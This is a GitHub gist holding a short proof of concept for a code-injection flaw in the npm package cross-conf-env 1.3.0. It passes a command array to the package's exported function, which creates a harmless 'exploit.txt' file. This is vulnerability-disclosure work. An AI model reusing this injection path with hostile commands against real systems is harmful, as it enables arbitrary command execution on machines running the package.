mcoimbra/cross-conf-env-1.3.0_poc.js

Created October 26, 2023 21:07

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/mcoimbra/169182575c034961e93ae18d755bbb33.js"></script>
Save mcoimbra/169182575c034961e93ae18d755bbb33 to your computer and use it in GitHub Desktop.

Download ZIP

Package cross-conf-env: Possible to inject code in the argument of the package's exported function crossConfEnv

Raw

cross-conf-env-1.3.0_poc.js

	'use strict'

	const pkg = require('cross-conf-env');

	// This will create a local 'exploit.txt' file.
	pkg.default(['touch', 'exploit.txt']);

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment